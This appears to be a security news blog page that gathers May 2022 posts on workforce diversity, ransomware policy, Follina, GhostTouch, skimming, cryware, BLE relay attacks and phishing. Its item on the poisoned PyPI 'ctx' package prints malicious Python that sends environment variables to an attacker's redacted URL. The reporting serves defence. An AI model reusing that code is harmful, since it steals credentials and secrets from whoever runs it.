InfoSec and Compliance – With 20 years of blogging experience, DISC InfoSec blog is dedicated to providing trusted insights and practical solutions for professionals and organizations navigating the evolving cybersecurity landscape. From cutting-edge threats to compliance strategies, this blog is your reliable resource for staying informed and secure. Dive into the content, connect with the community, and elevate your InfoSec expertise!
Cybersecurity is required to be a dynamic industry because cybercriminals don’t take days off. Cybersecurity professionals must be innovative, creative, and attentive to keep gaining the upper hand on cybercriminals. Unfortunately, there are millions of unfilled cybersecurity job openings around the globe.
The gender divide
The problem of not enough cybersecurity professionals is exacerbated by a lack of diversity in the sector. There is a disproportionately low ratio of women to men within the entire technology industry. In the science, technology, engineering and math (STEM) industries, women make up only 24% of the workforce, and while this has increased from just 11% in 2017, there is clearly still a sizeable disparity.
The cybersecurity industry is performing only marginally better than STEM, with women making up roughly 24% of cybersecurity jobs globally, according to (ISC)².
There is also a parallel trend here: women have superior qualifications in cybersecurity than their male counterparts. Over half of women – 52% – have postgraduate degrees, compared to just 44% of men. More importantly, 28% of women have cybersecurity-related qualifications, while only 20% of men do. This raises one important point, which is that women feel that they must be more qualified than men to compete for and hold the same cybersecurity roles. The industry is, therefore, losing a significant pool of talent because of this perception. Untapped talent means less innovation and dynamism in the products and services businesses offer.
Unfortunately, the challenges for women do not appear to stop once they enter the cybersecurity workforce. Pay disparity continues to blight the industry. Women reported being on smaller salaries at a higher proportion than men. 17% of women reported earning between $50,000 and $99,000 compared to 29% of men. However, there are signs that this disparity in pay is closing. For those in cybersecurity who earned over $100,000, the difference in percentage between men and women was much closer. This is encouraging and shows that once women are in the industry, they can enjoy as much success as men.
Nevertheless, reaching these higher levels of the cybersecurity industry is far from straightforward for women at present. It is an unavoidable fact that women still struggle to progress as easily compared to male counterparts. A key reason for this is cultural: women are disinclined to shout about their achievements, as such they regularly go unnoticed when promotions and other opportunities come round.
The cybersecurity industry is starting to embrace diversity in the workforce, but there is a long way to go before women are as valued in cybersecurity as men. With the current skills deficit hampering the growth of cybersecurity providers, this is a perfect opportunity for the industry and individual providers to break the bias and turn to women to speed up innovation and improve defense against cybercriminals.
Welcome to our May 2022 review of data breaches and cyber attacks. We identified 77 security incidents during the month, resulting in 49,782,129 compromised records.
You can find the full list below, with incidents affecting UK organisations listed in bold.
“Wise is not the one who knows all the answers but the one who knows what questions to ask”
More than an article, this is a conversation starter for the CISO and his/her team: What are your answers for this list of essential question that any information security department must deal with?
Obviously there are many other questions, these are just the foundation for a security program.
These questions are ordered, it will be hard to answer the last ones without having answers for the first ones.
For your organization:
Who are the clients of the information security team?
What are the drivers for security? This will include Business, Technical and Compliance aspects.
What are the business significant security objectives? Have these been agreed with the clients of the information security team?
How do you model your organization and the systems it relies on?
What are the third parties you exchange information with?
What is the list of assets that need to be protected? Who owns them? Who controls them?
What are the threats or risks?
What is the list of security controls or processes you have in place? What is the success criteria for each? How frequently do you check that they are not just effective but successful?
What is the list of non-compliances that need to be remediated?
What is your level of compliance?
What is the list of vulnerabilities that need to be remediated?
What is your level of security (or risk)?
How do you maintain your knowledge base?
What is your level of security maturity? This measures not your security but your ability to maintain and improve your security.
How do you report the activity of the information security team?
How do you report the value of security to your clients?
How do you prove to third parties your level of security?
What do you plan to do to improve the level of security (or decrease risk)?
How easy or difficult was for you and your team to formulate an answer?
If you find these questions too easy, either you are truly great CISO (please share answers) or your suffer a severe case of Duning-Kruger. I will leave to those readers to find out which.
Researchers uncovered 3.6M accessible MySQL servers worldwide that represent a potential attack surface for their owners.
Researchers from Shadow Server scanned the internet for publicly accessible MySQL server instances on port 3306/TCP and uncovered 3.6M installs worldwide responding to their queries.
These publicly accessible MySQL server instances represent a potential attack surface for their owners.
“These are instances that respond to our MySQL connection request with a Server Greeting. Surprisingly to us, we found around 2.3M IPv4 addresses responding with such a greeting to our queries. Even more surprisingly, we found over 1.3M IPv6 devices responding as well (though mostly associated with a single Autonomous System).” states the report published by the researchers.
Most of the accessible IPv4 MySQL servers are in the United States (740.1K), China (296.3K), Poland (207.8K) and Germany (174.9K).
Accessible IPv4 MySQL servers
Most of the accessible IPv6 MySQL servers are in the United States (460.8K), Netherlands (296.3K), Singapore (218.2K) and Germany (173.7K).
“It is unlikely that you need to have your MySQL server allowing for external connections from the Internet (and thus a possible external attack surface). If you do receive a report on your network/constituency take action to filter out traffic to your MySQL instance and make sure to implement authentication on the server.” concludes the report.
Cybersecurity and Infrastructure Security Agency (CISA) director Jen Easterly announced the formation of a joint ransomware task force, plans for which were originally outlined in the Cyber Incident Reporting for Critical Infrastructure Act of 2022 (CIRCIA).
Easterly announced the news at an Institute for Security and Technology (IST) event on May 20 in Washington, D.C., and also said the task force would have its first official meeting within the next few months.
“We’re very excited about it,” Easterly said during an event interview. “We think that this will actually build really nicely on the infrastructure and the scaffolding that we’ve developed with the [Joint Cyber Defense Collaborative] to use what we have as part of the federal cyber ecosystem and the companies that are part of the JCDC alliance to plug into the hub as envisioned in the Ransomware Task Force Report.”
She added that the FBI will co-chair the task force, which means the operational leads will be Eric Goldstein, CISA’s head of cyber and Bryan Vorndran, the assistant director of the FBI’s Cyber Division.
CIRCIA’s Reporting Requirements
Passed as part of the omnibus spending bill in March, CIRCIA focuses on critical infrastructure companies—ranging from financial services firms to energy companies, or other entities where a cybersecurity event would impact economic security or public health and safety.
CIRCIA would require these entities to report any substantial cybersecurity incidents or ransom payments to the federal government within 72 and 24 hours, respectively.
The Institute for Security and Technology issued a report last year that included a framework to combat the rising threat of ransomware.
Former State Department cybersecurity coordinator Chris Painter, also a co-chair of the ransomware task force working groups, explained during the IST event that combating ransomware threats requires a high degree of coordination and cooperation between government agencies.
“Establishing the new task force signals that this issue continues to be a priority and is a recognition that combating ransomware will take a sustained, long-term effort,” he said. “It should work to leverage federal and private sector capability to disrupt the major ransomware actors in any way possible.”
Easterly said the focus would be on operationalizing progress in an agile way and disrupting these bad actors, with CISA on the resilience/defense side.
“We want to work with all of our partners across the federal cyber ecosystem and the industry to actually be able to go after these actors in a very agile way at scale,” she said.
She said the days of holding threat report briefings on a quarterly basis are long over; it is no longer a realistic way of protecting critical infrastructure threats.
“We all have to be in the room all the time, sharing information constantly so that we can create that picture together, because it’s very likely that industry is going to see a cyberattack on the homeland before we see it,” Easterly said. “So, we have to be in the same room—we have to trust each other.”
Beyond Ransomware
The event also featured a keynote address from Deputy Attorney General Lisa Monaco, who announced twin initiatives from the Department of Justice.
The first is aimed at tackling illegal cryptocurrency transactions while the second concerns the establishment of a cybersecurity operations international liaison position to speed up international operations aimed at disrupting the activities of cybersecurity threat actors globally
“We’ve got to evolve to keep pace with the threat and the nation-states and criminal actors driving it,” Monaco said.
Matthew Warner, CTO and co-Founder at Blumira, a provider of automated threat detection and response technology, said as attacks against businesses and infrastructure have continued to grow, so has the impact of these attacks.
“Ransomware is a systemic risk to all computing at this point, which requires a unique response from governments,” he said. “To do this, however, requires a task force that can respond in a way that we have not seen before in cybersecurity.”
He explained if governments wanted to defend their and their allies’ infrastructures—commercial or not—then reducing ransomware across the globe is paramount.
Alex Ondrick, director of security operations at BreachQuest, an incident response specialist, noted that information-sharing and trust-building between government and private business is long overdue by at least a decade, but that initiatives such as JRTF could improve upon a growing private-public partnership.
“Governments have come to increasingly rely on the private sector, yet governments are only just beginning to reciprocate information-sharing,” he said. “Given new legislation and interest, CISA’s JRTF has an opportunity to increase the lines of communication and improve information-sharing.”
Ondrick added that an increasingly decentralized ransomware threat landscape has created an opportunity for more ransomware-as-a-service (RaaS) attackers and more ransomware attacks overall.
“Ransomware has become a key fixture of cybercrime as we move towards a post-COVID-19 world, and ransomware—as related to critical infrastructure—continues to evolve,” he said. “Preventing a ransomware attack against critical infrastructure is of the utmost seriousness and urgency.
Regarding the DoJ’s initiative tackling illegal cryptocurrency transfers, Warner pointed out that the nature of blockchain—and therefore, cryptocurrencies—means every transaction is available for the world to see.
“While attackers will try to move this money around through tumblers, in the end, it must end up somewhere to convert to usable currency,” he said. “Government and NGO initiatives have the opportunity to track cryptocurrency use and look for clusters of ransomware payments being funneled through the blockchain.”
If the target wallets and/or transfers in and out of these potential ransomware wallets can be identified, then governments can disrupt the actors by seizing cryptocurrency from them—this was the case when the U.S. seized $30 million in cryptocurrency from the NetWalker ransomware group in early 2021.
“Ransomware will only continue to grow, as will new attacks leveraged by ransomware, which means that not only the government but also all private entities must level up quickly to defend properly,” Warner said.
(CVSS score 7.8), in the Microsoft Office productivity suite.
“On Monday May 30, 2022, Microsoft issued
CVE-2022-30190
regarding the Microsoft Support Diagnostic Tool (MSDT) in Windows vulnerability.” reads the advisory published by Microsoft. “A remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word. An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user’s rights.”
This week, the cybersecurity researcher nao_sec discovered a malicious Word document (“05-2022-0438.doc”) that was uploaded to VirusTotal from Belarus. The document uses the remote template feature to fetch an HTML and then uses the “ms-msdt” scheme to execute PowerShell code.
Interesting maldoc was submitted from Belarus. It uses Word's external link to load the HTML and then uses the "ms-msdt" scheme to execute PowerShell code.https://t.co/hTdAfHOUx3pic.twitter.com/rVSb02ZTwt
The popular cybersecurity expert Kevin Beaumont, who named the bug Follina, published an analysis of the flaw.
“The document uses the Word remote template feature to retrieve a HTML file from a remote webserver, which in turn uses the ms-msdt MSProtocol URI scheme to load some code and execute some PowerShell.” reads the analysis published by Beaumont.“There’s a lot going on here, but the first problem is Microsoft Word is executing the code via msdt (a support tool) even if macros are disabled. Protected View does kick in, although if you change the document to RTF form, it runs without even opening the document (via the preview tab in Explorer) let alone Protected View.”
The issue affects multiple Microsoft Office versions, including Office, Office 2016, and Office 2021.
Microsoft recommends disabling the MSDT URL Protocol as workarounds, below are the instructions included in the guidance:
To disable the MSDT URL Protocol
Disabling MSDT URL protocol prevents troubleshooters being launched as links including links throughout the operating system. Troubleshooters can still be accessed using the Get Help application and in system settings as other or additional troubleshooters. Follow these steps to disable:
Run Command Prompt as Administrator.
To back up the registry key, execute the command “reg export HKEY_CLASSES_ROOT\ms-msdt filename“
Execute the command “reg delete HKEY_CLASSES_ROOT\ms-msdt /f”.
How to undo the workaround
Run Command Prompt as Administrator.
To back up the registry key, execute the command “reg import filename”
Microsoft credited crazyman with Shadow Chaser Group, the tech giant labeled the flaw as “fixed” on April 21, 2022, and dismissed the vulnerability as “not a security issue” because the diagnostic tool requires a passkey for its execution.
How to Identify and Reduce the Risks of 3rd Party Vendors
In a landscape filled with new threats and regulations managing the risks of 3rd party vendors is vitally important. Most financial institutions have tens of thousands of supplier relationships, and many data breaches originate through IT Vendors within the supply chain. Compounding this dilemma, regulators including OIG, OCC, FFIEC and others are increasing their focus on potential 3rd party risks. They want to see organizations proactively identifying potential risks, verifying that business partners providers and their employees are compliant, monitoring for changes that might create new risks or compliance gaps, and managing the investigation and remediation of incidents.
During this webcast our panel will specifically address the practical ‘how to’s’ around identifying and reducing the risks of 3rd party vendors, and we will focus on:
Typical risks resulting from third party relationships
Common deficiencies of vendor management practices used during the on-boarding process, and the life of the relationship
Moving from a reactive to a proactive (preventative) vendor management process
Real world examples will be used to illustrate the key points and recommendations
In a landscape filled with new threats and regulations managing the risks of 3rd party vendors is vitally important. Most financial institutions have tens of thousands of supplier relationships, and many data breaches originate through IT Vendors within the supply chain. Compounding this dilemma, regulators including OIG, OCC, FFIEC and others are increasing their focus on potential 3rd party risks. They want to see organizations proactively identifying potential risks, verifying that business partners providers and their employees are compliant, monitoring for changes that might create new risks or compliance gaps, and managing the investigation and remediation of incidents.
During this webcast our panel will specifically address the practical ‘how to’s’ around identifying and reducing the risks of 3rd party vendors, and we will focus on:
– Typical risks resulting from third party relationships – Common deficiencies of vendor management practices used during the on-boarding process, and the life of the relationship – Moving from a reactive to a proactive (preventative) vendor management process – Real world examples will be used to illustrate the key points and recommendations
Security researchers devised a technique, dubbed GhostTouch, to remotely control touchscreens using electromagnetic signals.
A team of researchers from Zhejiang University and Technical University of Darmstadt devised a technique, dubbed GhostTouch, to remotely control capacitive touchscreens using electromagnetic signals.
According to the experts, GhostTouch is the first active contactless attack against capacitive touchscreens.
GhostTouch uses electromagnetic interference (EMI) to remotely inject fake touch points into a capacitive device. The researchers demonstrated how to inject two types of basic touch events, taps and swipes, into targeted locations of the touchscreen. The events allowed the researchers to control the devices (i.e. answering an eavesdropping phone call, pressing the button, swiping up to unlock), the attack technique was successful on nine smartphone models.
“We can inject targeted taps continuously with a standard deviation of as low as 14.6 x 19.2 pixels from the target area, a delay of less than 0.5s and a distance of up to 40mm. We show the real-world impact of the GhostTouch attacks in a few proof-of-concept scenarios, including answering an eavesdropping phone call, pressing the button, swiping up to unlock, and entering a password.” reads the research paper published by the academics. “Finally, we discuss potential hardware and software countermeasures to mitigate the attack.”
The GhostTouch system consists of two components, a touch injector and a phone locator. The touch injector is used to inject touch events into the touchscreen and includes a signal generator, an amplifier, an on/off switch, and a receiving antenna array. The phone locator is used to identify the position of the touchscreen and consists of a sensing antenna array, a data acquisition device, and a location calculator.
The experimental lab setup up by the researchers is composed of an electrostatic gun used to generate a strong pulse signal which is sent to an antenna to transmit an electromagnetic field to the touchscreen.
The experts tested the technique against nine different smartphone models, including Galaxy A10s, Huawei P30 Lite, Honor View 10, Galaxy S20 FE 5G, Nexus 5X, Redmi Note 9S, Nokia 7.2, Redmi 8, and an iPhone SE (2020).
“We demonstrate the feasibility of this attack in the real world.” concludes the paper. “In places like a cafe, library, meeting room, or conference lobbies, people might place their smartphone face-down on the table2. An attacker may embed the attack equipment under the table and launch attacks remotely. For example, an attacker may impersonate the victim to answer a phone call which would eavesdrop the private conversation, or visit a malicious website.”
The researchers provided a series of countermeasures to neutralize the attack, including adding electromagnetic shielding to block EMI, reinforcing the touchscreen, improving the detection algorithm of the touchscreen, and forcing some form of authentication for the execution of high-risk actions.
US Critical Infrastructure Security Agency (CISA) adds 41 new vulnerabilities to its Known Exploited Vulnerabilities Catalog.
The Cybersecurity & Infrastructure Security Agency (CISA) has added 41 flaws to its Known Exploited Vulnerabilities Catalog, including recently addressed issues in the Android kernel (CVE-2021-1048 and
The Cisco IOS XR flaw (CVE-2022-20821, CVSS score: 6.5, is actively exploited in attacks in the wild, it resides in the health check RPM of Cisco IOS XR Software. An unauthenticated, remote attacker could trigger the issue to access the Redis instance that is running within the NOSi container.
A keen-eyed researcher at SANS recently wrote about a new and rather specific sort of supply chain attack against open-source software modules in Python and PHP.
Following on-line discussions about a suspicious public Python module, Yee Ching Tok noted that a package called ctx in the popular PyPi repository had suddenly received an “update”, despite not otherwise being touched since late 2014.
In theory, of course, there’s nothing wrong with old packages suddenly coming back to life.
Sometimes, developers return to old projects when a lull in their regular schedule (or a guilt-provoking email from a long-standing user) finally gives them the impetus to apply some long-overdue bug fixes.
In other cases, new maintainers step up in good faith to revive “abandonware” projects.
But packages can become victims of secretive takeovers, where the password to the relevant account is hacked, stolen, reset or otherwise compromised, so that the package becomes a beachhead for a new wave of supply chain attacks.
Simply put, some package “revivals” are conducted entirely in bad faith, to give cybercriminals a vehicle for pushing out malware under the guise of “security updates” or “feature improvements”.
The attackers aren’t necessarily targeting any specific users of the package they compromise – often, they’re simply watching and waiting to see if anyone falls for their package bait-and-switch…
…at which point they have a way to target the users or companies that do.
New code, old version number
In this attack, Yee Ching Tok noticed that altough the package suddenly got updated, its version number didn’t change, presumably in the hope that some people might [a] take the new version anyway, perhaps even automatically, but [b] not bother to look for differences in the code.
But a diff (short for difference, where only new, changed or deleted lines in the code are examined) showed added lines of Python code like this:
You may remember, from the infamous Log4Shell bug, that so-called environment variables, accessible via os.environ in Python, are memory-only key=value settings associated with a specific running program.
Data that’s presented to a program via a memory block doesn’t need to be written to disk, so this is a handy way of passing across secret data such as encryption keys while guarding against saving the data improperly by mistake.
However, if you can poison a running program, which will already have access to the memory-only process environment, you can read out the secrets for yourself and steal the, for example by sending them out buried in regular-looking network traffic.
If you leave the bulk of the source code you’re poisoning untouched, its usual functions will still work as before, and so the malevolent tweaks in the package are likely to go unnoticed.
Why now?
Apparently, the reason this package was attacked only recently is that the server name used for email by the original maintainer had just expired.
The attackers were therefore able to buy up the now-unused domain name, set up an email server of their own, and reset the password on the account.
Interestingly, the poisoned ctx package was soon updated twice more, with more added “secret sauce” squirrelled away in the infected code, this time including more aggressive data-stealing code.
The requests.get() line below connects to an external server controlled by the crooks, though we have redacted the domain name here:
defsendRequest(self):str=""for_, v inenviron.items():str+=v +" "### --encode string into base64resp =requests.get("https://[REDACTED]/hacked/"+str)
The redacted exfiltration server will receive the encoded environment variables (including any stolen data such as access keys) as an innocent-looking string of random-looking data at the end of the URL.
The response that comes back doesn’t actually matter, because it’s the outgoing request, complete with appended secret data, that the attackers are after.
If you want to try this for yourself, you can create a standalone Python program based on the pseudocode above, such as this::
Then start a listening HTTP pseudoserver in a separate window (we used the excellent ncat utility from the Nmap toolkit, as seen below), and run the Python code.
Threat actors behind web skimming campaigns are using malicious JavaScript to mimic Google Analytics and Meta Pixel scripts to avoid detection.
Microsoft security researchers recently observed web skimming campaigns that used multiple obfuscation techniques to avoid detection.
The threat actors obfuscated the skimming script by encoding it in PHP, which, in turn, was embedded in an image file, using this trick the code is executed when a website’s index page is loaded.
The experts also observed compromised web applications injected with malicious JavaScript masquerading as Google Analytics and Meta Pixel (formerly Facebook Pixel) scripts. Some skimming scripts also included anti-debugging mechanisms.
The term web skimming refers to the criminal practice to harvest payment information of visitors of a website during checkout. Crooks use to exploit vulnerabilities in e-commerce platforms and CMSs to inject the skimming script into the page of the e-store. In some cases, attackers can exploit vulnerabilities in installed third-party plugins and themes to inject malicious scripts.
“During our research, we came across two instances of malicious image files being uploaded to a Magento-hosted server. Both images contained a PHP script with a Base64-encoded JavaScript, and while they had identical JavaScript code, they slightly differed in their PHP implementation.” reads the analysis published by Microsoft. “The first image, disguised as a favicon (also known as a shortcut or URL icon), was available on VirusTotal, while the other one was a typical web image file discovered by our team.”
Microsoft also observed attackers masquerading as Google Analytics and Meta Pixel (formerly Facebook Pixel) scripts to avoid raising suspicion.
The attackers place a Base64-encoded string inside a spoofed Google Tag Manager code. This string decoded to
trafficapps.business
/data.php?p=form.
Encoded skimming script in a spoofed Google Analytics code (Source Microsoft)
Experts noticed that the attackers behind the Meta Pixel spoofing used newly registered domains (NRDs) using HTTPS.
“Given the increasingly evasive tactics employed in skimming campaigns, organizations should ensure that their e-commerce platforms, CMSs, and installed plugins are up to date with the latest security patches and that they only download and use third-party plugins and services from trusted sources,” Microsoft concludes.
Many security engineers are already one foot out the door. Why?
The position of securityengineer has become a pivotal role for modern security teams. Practitioners are responsible for critical monitoring of networks and systems to identify threats or intrusions that could cause immense harm to an organization.
They must analyze troves of security-related data, detect immediate threats as early as possible on the cyber kill chain. From their vantage point, they are often best positioned to evaluate security monitoring solutions and recommend security operations improvement to management.
In this video for Help Net Security, Jack Naglieri, CEO of Panther Labs, discusses a recent report which found that 80% of security engineers are experiencing burnout.
Google addressed a high-severity flaw in its OAuth client library for Java that could allow attackers with a compromised token to deploy malicious payloads.
Google addressed a high-severity authentication bypass flaw in Google OAuth Client Library for Java, tracked as CVE-2021-22573 (CVS Score 8.7), that could be exploited by an attacker with a compromised token to deploy malicious payloads.
The Google OAuth Client Library for Java is designed to work with any OAuth service on the web, not just with Google APIs. The library is built on the Google HTTP Client Library for Java, and it supports Java 7 (or higher) standard (SE) and enterprise (EE), Android 4.0 (or higher), and Google App Engine.
The root cause of the issue is that the IDToken verifier does not verify if the token is properly signed. This means that an attacker can serve a malicious payload that doesn’t come from a trusted provider
“The vulnerability is that IDToken verifier does not verify if token is properly signed. Signature verification makes sure that the token’s payload comes from valid provider, not from someone else. An attacker can provide a compromised token with custom payload.” reads the description published by NIST. “The token will pass the validation on the client side. We recommend upgrading to version 1.33.3 or above”
The vulnerability was reported by the security researcher Tamjid Al Rahat on March 12, the issue was awarded $5,000 as part of the company bug bounty program. Google addressed the issue with the release of the version 1.33.3 in April.
Users of the Google OAuth Client Library for Java are recommended to upgrade to version 1.33.3 or later.
White hat hackers earned a total of $800,000 on the first day of the Pwn2Own Vancouver 2022, $450,000 for exploits targeting Microsoft Teams.
Pwn2Own Vancouver 2022 hacking contest has begun, it is the 15th edition of this important event organized by Trend Micro’s Zero Day Initiative (ZDI). This year, 17 contestants are attempting to exploit 21 targets across multiple categories.
During the first day of the event, white hat hackers earned a total of $800,000, a record for the first day of this contest, including $450,000 for successful exploits targeting Microsoft Teams.
All the attempts made during the first day were successful, the participants explored a total of 16 flaws affecting Microsoft Teams, Oracle VirtualBox, Firefox, Windows 11, Ubuntu, and Safari.
SUCCESS – Hector “p3rr0” Peralta was able to demonstrate an improper configuration against Microsoft Teams. He earns $150,000 and 15 Master of Pwn points.
SUCCESS – Masato Kinugawa was able to execute a 3-bug chain of injection, misconfiguraton and sandbox escape against Microsoft Teams, earning $150,000 and 15 Master of Pwn points.
SUCCESS – Daniel Lim Wee Soong (@daniellimws, Poh Jia Hao (@Chocologicall), Li Jiantao (@CurseRed) & Ngo Wei Lin (@Creastery of STAR Labs successfully demonstrated their zero-click exploit of 2 bugs (injection and arbitrary file write) on Microsoft Teams. They earn $150,000 and 15 Master of Pwn points.
Manfred Paul (@_manfp) successfully demonstrated the exploitation of prototype pollution and improper input validation on Mozilla Firefox. Paul earned $100,000 and 10 Master of Pwn points.
Paul also exploited an out-of-band write issue on Apple Safari and earned $50,000 and 5 additional Master of Pwn points.
Microsoft researchers warn of the rising threat of cryware targeting non-custodial cryptocurrency wallets, also known as hot wallets.
Microsoft warns of the rise of cryware, malicious software used to steal info an dfunds from non-custodial cryptocurrency wallets, also known as hot wallets. Data stolen from this kind of malware includes private keys, seed phrases, and wallet addresses, that could be used by threat actors to initiate fraudulent transactions.
“Cryware are information stealers that collect and exfiltrate data directly from non-custodial cryptocurrency wallets, also known as hot wallets. Because hot wallets, unlike custodial wallets, are stored locally on a device and provide easier access to cryptographic keys needed to perform transactions, more and more threats are targeting them.” reads the post published by Microsoft.
The experts pointed out that the theft of cryptocurrency is irreversible, unlike credit cards and other financial transactions there is no mechanism to reverse fraudulent transactions.
This cryware is automating the scanning process for hot wallet data exposed online.
The increasing popularity of cryptocurrency is attracting cybercrime that is using different means to target the cryptocurrency industry. Below is a list of threats that are currently leveraging cryptocurrency:
Cryptojackers. One of the threat types that surfaced and thrived since the introduction of cryptocurrency, cryptojackers are mining malware that hijacks and consumes a target’s device resources for the former’s gain and without the latter’s knowledge or consent. Based on our threat data, we saw millions of cryptojacker encounters in the last year.
Ransomware. Some threat actors prefer cryptocurrency for ransom payments because it provides transaction anonymity, thus reducing the chances of being discovered.
Password and info stealers. Apart from sign-in credentials, system information, and keystrokes, many info stealers are now adding hot wallet data to the list of information they search for and exfiltrate.
ClipBanker trojans. Another type of info stealer, this malware checks the user’s clipboard and steals banking information or other sensitive data a user copies. ClipBanker trojans are also now expanding their monitoring to include cryptocurrency addresses.
Microsoft described the techniques used by crooks to steal hot wallet data, including clipping and switching, memory dumping, wallet file theft, phishing sites and fake applications, and keylogging.
Experts also warn of scams and other social engineering attacks that cybercriminals use to trick victims into sending funds to the attackers’ wallets.
Microsoft recommends users and organizations lock hot wallets when not actively trading, disconnect sites connected to the wallet, never store private keys in plaintext, ensure that browser sessions are terminated after every transaction, enable MFA for wallet authentication, double-check hot wallet transactions and approvals, use hardware wallets to store private keys offline.
Security researchers at the NCC Group have developed a tool to carry out a Bluetooth Low Energy (BLE) relay attack that bypasses all existing protections to authenticate on target devices.
BLE technology is used in a wide spectrum of products, from electronics like laptops, mobile phones, smart locks, and building access control systems to cars like Tesla Model 3 and Model Y.
Pushing out fixes for this security problem is complicated, and even if the response is immediate and coordinated, it would still take a long time for the updates to trickle to impacted products.
How the attack works
In this type of relay attacks, an adversary intercepts and can manipulate the communication between two parties, such as the key fob that unlocks and operates the car and the vehicle itself.
This places the attacker in the middle of the two ends of the communication, allowing them to relay the signal as if they were standing right next to the car.
Products that rely on BLE for proximity-based authentication protect against known relay attack methods by introducing checks based on precise amounts of latency and also link-layer encryption.
NCC Group has developed a tool that operates at the link layer and with a latency of 8ms that is within the accepted 30ms range of the GATT (Generic ATTribute Profile) response.
“Since this relay attack operates at the link layer, it can forward encrypted link layer PDUs. It is also capable of detecting encrypted changes to connection parameters (such as connection interval, WinOffset, PHY mode, and channel map) and continuing to relay connections through parameter changes. Thus, neither link layer encryption nor encrypted connection parameter changes are defences against this type of relay attack.” – NCC Group
According to Sultan Qasim Khan, a senior security consultant at NCC Group, it takes about ten seconds to run the attack and it can be repeated endlessly.
Both the Tesla Model 3 and Model Y use a BLE-based entry system, so NCC’s attack could be used to unlock and start the cars.
While technical details behind this new BLE relay attack have not been published, the researchers say that they tested the method on a Tesla Model 3 from 2020 using an iPhone 13 mini running version 4.6.1-891 of the Tesla app.
“NCC Group was able to use this newly developed relay attack tool to unlock and operate the vehicle while the iPhone was outside the BLE range of the vehicle” – NCC Group
During the experiment, they were able to deliver to the car the communication from the iPhone via two relay devices, one placed seven meters away from the phone, the other sitting three meters from the car. The distance between the phone and the car was 25 meters.
The experiment was also replicated successfully on a Tesla Model Y from 2021, since it uses similar technologies. Below is a demonstration of the attack:
These findings were reported to Tesla on April 21st. A week later, the company responded by saying “that relay attacks are a known limitation of the passive entry system.”
The researchers also notified Spectrum Brands, the parent company behind Kwikset (makers of the Kevo line of smart locks).
What can be done
NCC Group’s research on this new proximity attack is available in three separate advisories, for BLE in general, one for Tesla cars, and another for Kwikset/Weiser smart locks, each illustrating the issue on the tested devices and how it affects a larger set of products from other vendors.
The Bluetooth Core Specification warns device makers about relay attacks and notes that proximity-based authentication shouldn’t be used for valuable assets.
This leaves users with few possibilities, one being to disable it, if possible, and switch to an alternative authentication method that requires user interaction.
Another solution would be for makers to adopt a distance bounding solution such as UWB (ultra-wideband) radio technology instead of Bluetooth.
Tesla owners are encouraged to use the ‘PIN to Drive’ feature, so even if their car is unlocked, at least the attacker won’t be able to drive away with it.
Additionally, disabling the passive entry functionality in the mobile app when the phone is stationary would make the relay attack impossible to carry out.
If none of the above is possible on your device, keep in mind the possibility of relay attacks and implement additional protection measures accordingly.
Phishing is among the biggest cyber threats facing organisations. According to Proofpoint’s 2021 State of the Phish Report, more than 80% of organisations fell victim to a phishing attack last year.
One of the most frustrating things about this is that most people know what phishing is and how it works, but many still get caught out.
The growing sophisticated of phishing scams has contributed to that. They might still have the same objective – to steal our personal data or infect our devices – but there are now countless ways to do that.
In this blog, we look at five of the most common types of phishing email to help you spot the signs of a scam.
1. Email phishing
Most phishing attacks are sent by email. The crook will register a fake domain that mimics a genuine organisation and sends thousands of generic requests.
The fake domain often involves character substitution, like using ‘r’ and ‘n’ next to each other to create ‘rn’ instead of ‘m’.
In other cases, the fraudsters create a unique domain that includes the legitimate organisation’s name in the URL. The example below is sent from ‘olivia@amazonsupport.com’.
The recipient might see the word ‘Amazon’ in the sender’s address and assume that it was a genuine email.
There are many ways to spot a phishing email, but as a general rule, you should always check the email address of a message that asks you to click a link or download an attachment.
2. Spear phishing
There are two other, more sophisticated, types of phishing involving email.
The first, spear phishing, describes malicious emails sent to a specific person. Criminals who do this will already have some or all of the following information about the victim:
Their name;
Place of employment;
Job title;
Email address; and
Specific information about their job role.
You can see in the example below how much more convincing spear phishing emails are compared to standard scams.
The fraudster has the wherewithal to address the individual by name and (presumably) knows that their job role involves making bank transfers on behalf of the company.
The informality of the email also suggests that the sender is a native English speaker, and creates the sense that this is a real message rather than a template.
3. Whaling
Whaling attacks are even more targeted, taking aim at senior executives. Although the end goal of whaling is the same as any other kind of phishing attack, the technique tends to be a lot subtler.
Tricks such as fake links and malicious URLs aren’t helpful in this instance, as criminals are attempting to imitate senior staff.
Whaling emails also commonly use the pretext of a busy CEO who wants an employee to do them a favour.
Emails such as the above might not be as sophisticated as spear phishing emails, but they play on employees’ willingness to follow instructions from their boss. Recipients might suspect that something is amiss but are too afraid to confront the sender to suggest that they are being unprofessional.
4. Smishing and vishing
With both smishing and vishing, telephones replace emails as the method of communication.
Smishing involves criminals sending text messages (the content of which is much the same as with email phishing), and vishing involves a telephone conversation.
One of the most common smishing pretexts are messages supposedly from your bank alerting you to suspicious activity.
In this example, the message suggests that you have been the victim of fraud and tells you to follow a link to prevent further damage. However, the link directs the recipient to a website controlled by the fraudster and designed to capture your banking details.
5. Angler phishing
A relatively new attack vector, social media offers several ways for criminals to trick people. Fake URLs; cloned websites, posts, and tweets; and instant messaging (which is essentially the same as smishing) can all be used to persuade people to divulge sensitive information or download malware.
Alternatively, criminals can use the data that people willingly post on social media to create highly targeted attacks.
As this example demonstrates, angler phishing is often made possible due to the number of people containing organisations directly on social media with complaints.
Organisations often use these as an opportunity to mitigate the damage – usually by giving the individual a refund.
However, scammers are adept at hijacking responses and asking the customer to provide their personal details. They are seemingly doing this to facilitate some form of compensation, but it is instead done to compromise their accounts.
Your employees are your last line of defence
Organisations can mitigate the risk of phishing with technological means, such as spam filters, but these have consistently proven to be unreliable.
Malicious emails will still get through regularly, and when that happens, the only thing preventing your organisation from a breach is your employees’ ability to detect their fraudulent nature and respond appropriately.
Our Phishing Staff Awareness Course helps employees do just that, as well as explaining what happens when people fall victim and how they can mitigate the threat of an attack.
Researchers devised an attack technique to tamper the firmware and execute a malware onto a Bluetooth chip when an iPhone is “off.”
A team of researchers from the Secure Mobile Networking Lab (SEEMOO) at the Technical University of Darmstadt demonstrated a technique to tamper with the firmware and load malware onto a chip while an iPhone is “OFF.”
Experts pointed out that when an iPhone is turned off, most wireless chips (Bluetooth, Near Field Communication (NFC), and Ultra-wideband (UWB)) continue to operate.
